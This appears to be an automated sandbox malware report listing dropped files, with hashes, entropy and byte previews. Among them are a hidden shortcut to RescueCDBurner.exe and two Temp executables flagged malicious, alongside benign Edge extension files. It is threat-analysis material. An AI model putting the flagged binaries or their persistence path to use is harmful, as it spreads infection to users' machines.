Preview:	{"logTime": "1005/094927", "correlationVector":"2Yoymfq2DNqKkEQxScdye6","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/094932", "correlationVector":"f8obPuKjAlRxEct+yTS+WU","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/094932", "correlationVector":"3424AD3BF2D647858C80467BB9A206FC","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/102334", "correlationVector":"R7sA2ORjmzFG+jb9x+Jiab","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/102334", "correlationVector":"C4F87C103BB24B0EA24A826332D35037","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/102550", "correlationVector":"gABMZMZtO1erzif4SmQ7ja","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/102550", "correlationVector":"15ED17FAD0C64F2DB623BFAC8C77343C","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/103007", "correlationVector":"+pZdWNzglJOCMtTzwL811z","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/103008", "correlationVector":"F3AB7FFA

C:\Users\user\AppData\Local\Temp\d91ff8cc

Download File

Process:	C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
File Type:	data
Category:	dropped
Size (bytes):	5698949
Entropy (8bit):	7.7295132791594785
Encrypted:	false
SSDEEP:	98304:sBr1SV1sx0n/OBmMPsOloNEJ1TQwyOWnEr3CjiVe3m7fmqUKzhXOt1kTjl/SMCJ6:sBJMgbPHMEJ1PyTnu3CWVQQfm9KzFOTs
MD5:	10E53B2EF98265B7FA3B4DF07D5BC966
SHA1:	91791CC82C41E874A2E1713EF91CC1CFE2AEA4D6
SHA-256:	3D7739788C0E0C4D41034995B34BEAE9FDA70E40B9712F8348A57280D6EC1361
SHA-512:	B252D9F97A980005BC813272D1C48F2D091B209C62C768253663613F6A9339D059C4E5004C389BBED60CE223451A4C4E728B9E860D4F1896392DE194BB17E097
Malicious:	false
Preview:	f..d..e..e..d..A..q..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..@..!..@.........2.....6...............6......e..e..e..e..e..e..e..e..e..e..e..&......... ...e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..&......,.....e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..@..!...9......... ........e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e..e......K...W...e..e..e..e..e..e..e..e..e..e..

C:\Users\user\AppData\Local\Temp\kkmrbb

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Jan 9 12:54:49 2025, mtime=Thu Jan 9 12:54:49 2025, atime=Fri Jan 3 17:35:24 2025, length=6487736, window=hide
Category:	dropped
Size (bytes):	925
Entropy (8bit):	5.020539260585558
Encrypted:	false
SSDEEP:	12:8bCw4/Ec7BSYCh4lZY//N3LG4KYhOOjGwD/OjAZNHky5uUkRUJ6bwD/8ghgfmV:8S/EcZlS9kYhBhyAsRUUo8Rm
MD5:	AD9256CFFCDA8D1CB7ED6AE47F2F9A9B
SHA1:	7C081F17054494C1F190FA28301C049227904FE8
SHA-256:	5B948D95EB87E9BF9F3F707A8CCD1DEED21EFE56E4D4BB5A47F5B57299F33032
SHA-512:	99A2997261642AC267C850B62840A9F86D28C03DB4CE35A1332953551BB8AFDDF3CD67E4391713C191D29FB131E997915BF3818E029F942DAD4646F5B097E76C
Malicious:	false
Preview:	L..................F.... ........b.......b....]@.^....b.......................:..DG..Yr?.D..U..k0.&...&.........5q........b..M...b......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N)Z.n...........................c..A.p.p.D.a.t.a...B.V.1.....)Z.n..Roaming.@......EW)N)Z.n.............................R.o.a.m.i.n.g.....^.1.....)Z.n..TASKMA~1..F......)Z.n)Z.n....V.....................2{C.T.a.s.k.M.a.n.a.g.e.....r.2...b.#Zl. .RESCUE~1.EXE..V......)Z.n)Z.n.............................R.e.s.c.u.e.C.D.B.u.r.n.e.r...e.x.e.......j...............-.......i....................C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe..+.....\.....\.R.o.a.m.i.n.g.\.T.a.s.k.M.a.n.a.g.e.\.R.e.s.c.u.e.C.D.B.u.r.n.e.r...e.x.e.`.......X.......302494...........hT..CrF.f4... .."..jc...+...E...hT..CrF.f4... .."..jc...+...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Local\Temp\lrgstosohhljqy

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2602496
Entropy (8bit):	6.716476069650749
Encrypted:	false
SSDEEP:	49152:n1OQlAlUlfd9t/8syxSyUah7H5fzO6mxvyktfrq3ePoLFFWMWcl8wAJYGOLOl7r6:0XidxpbW8cCxaqYv1
MD5:	55CA99F0DC9854368750B8886DC455FC
SHA1:	A4F73306D531A2C31E4ABDF7B223BE6F3AF48F8F
SHA-256:	08FFCE111757CA346B72844F6A6D0BE6D883782E71701BF1B3716865C4CE7DF4
SHA-512:	D3EB3280AEF50AF71734057BADB65EC72B033EAAB05193B7DD8A390D537E694085B27A2399CDAF69FC2A02912D53F1CFC693A1C73EF5B0A6561FA34C67FFBEA8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....jY.................."...'.....W..........@..............................1......e(...`... ..............................................p1.<.....1.8.....&.Tu............1............................. .&.(...................pq1. ............................text.....".......".................`..`.data........0".......".............@....rdata........#.......".............@..@.pdata..Tu....&..v....&.............@..@.xdata..$X...p'..Z...>'.............@..@.bss.... .....'..........................idata..<....p1.......'.............@....CRT....0.....1.......'.............@....tls..........1.......'.............@....rsrc...8.....1.......'.............@..@.reloc........1.......'.............@..Bgjwrx.........1.......'.............@...................................................................................................................................

C:\Users\user\AppData\Local\Temp\qlar

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2602496
Entropy (8bit):	6.716476069650749
Encrypted:	false
SSDEEP:	49152:n1OQlAlUlfd9t/8syxSyUah7H5fzO6mxvyktfrq3ePoLFFWMWcl8wAJYGOLOl7r6:0XidxpbW8cCxaqYv1
MD5:	55CA99F0DC9854368750B8886DC455FC
SHA1:	A4F73306D531A2C31E4ABDF7B223BE6F3AF48F8F
SHA-256:	08FFCE111757CA346B72844F6A6D0BE6D883782E71701BF1B3716865C4CE7DF4
SHA-512:	D3EB3280AEF50AF71734057BADB65EC72B033EAAB05193B7DD8A390D537E694085B27A2399CDAF69FC2A02912D53F1CFC693A1C73EF5B0A6561FA34C67FFBEA8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....jY.................."...'.....W..........@..............................1......e(...`... ..............................................p1.<.....1.8.....&.Tu............1............................. .&.(...................pq1. ............................text.....".......".................`..`.data........0".......".............@....rdata........#.......".............@..@.pdata..Tu....&..v....&.............@..@.xdata..$X...p'..Z...>'.............@..@.bss.... .....'..........................idata..<....p1.......'.............@....CRT....0.....1.......'.............@....tls..........1.......'.............@....rsrc...8.....1.......'.............@..@.reloc........1.......'.............@..Bgjwrx.........1.......'.............@...................................................................................................................................

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1369508352\4df76314-0f7e-4200-8190-ec14b64ba45a.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1369508352\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1753
Entropy (8bit):	5.8889033066924155
Encrypted:	false
SSDEEP:	48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
MD5:	738E757B92939B24CDBBD0EFC2601315
SHA1:	77058CBAFA625AAFBEA867052136C11AD3332143
SHA-256:	D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
SHA-512:	DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
Malicious:	false
Preview:	[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1369508352\CRX_INSTALL\content.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
Category:	dropped
Size (bytes):	9815
Entropy (8bit):	6.1716321262973315
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
MD5:	3D20584F7F6C8EAC79E17CCA4207FB79
SHA1:	3C16DCC27AE52431C8CDD92FBAAB0341524D3092
SHA-256:	0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
SHA-512:	315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1369508352\CRX_INSTALL\content_new.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
Category:	dropped
Size (bytes):	10388
Entropy (8bit):	6.174387413738973
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
MD5:	3DE1E7D989C232FC1B58F4E32DE15D64
SHA1:	42B152EA7E7F31A964914F344543B8BF14B5F558
SHA-256:	D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
SHA-512:	177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1369508352\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.698567446030411
Encrypted:	false
SSDEEP:	24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
MD5:	E805E9E69FD6ECDCA65136957B1FB3BE
SHA1:	2356F60884130C86A45D4B232A26062C7830E622
SHA-256:	5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
SHA-512:	049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
Malicious:	false
Preview:	{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\5af695b7-ddb1-4a68-a560-4ea64e1dffef.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	154477
Entropy (8bit):	7.835886983924039
Encrypted:	false
SSDEEP:	3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
MD5:	14937B985303ECCE4196154A24FC369A
SHA1:	ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
SHA-256:	71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
SHA-512:	1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...\|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.\|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,\|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\128.png

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	4982
Entropy (8bit):	7.929761711048726
Encrypted:	false
SSDEEP:	96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
MD5:	913064ADAAA4C4FA2A9D011B66B33183
SHA1:	99EA751AC2597A080706C690612AEEEE43161FC1
SHA-256:	AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
SHA-512:	162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
Malicious:	false
Preview:	.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...T.P.B...*Tx...=.Q..wv.w.....\|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......\|..}./.....e..,.K.1........W.u.v. ...\.o

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\af\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	908
Entropy (8bit):	4.512512697156616
Encrypted:	false
SSDEEP:	12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
MD5:	12403EBCCE3AE8287A9E823C0256D205
SHA1:	C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
SHA-256:	B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
SHA-512:	153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\am\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1285
Entropy (8bit):	4.702209356847184
Encrypted:	false
SSDEEP:	24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
MD5:	9721EBCE89EC51EB2BAEB4159E2E4D8C
SHA1:	58979859B28513608626B563138097DC19236F1F
SHA-256:	3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
SHA-512:	FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\ar\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1244
Entropy (8bit):	4.5533961615623735
Encrypted:	false
SSDEEP:	12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
MD5:	3EC93EA8F8422FDA079F8E5B3F386A73
SHA1:	24640131CCFB21D9BC3373C0661DA02D50350C15
SHA-256:	ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
SHA-512:	F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\az\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.867640976960053
Encrypted:	false
SSDEEP:	24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
MD5:	9A798FD298008074E59ECC253E2F2933
SHA1:	1E93DA985E880F3D3350FC94F5CCC498EFC8C813
SHA-256:	628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
SHA-512:	9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir2836_1814641995\CRX_INSTALL\_locales\be\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3107
Entropy (8bit):	3.535189746470889
Encrypted:	false
SSDEEP:	48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
MD5:	68884DFDA320B85F9FC5244C2DD00568
SHA1:	FD9C01E03320560CBBB91DC3D1917C96D792A549
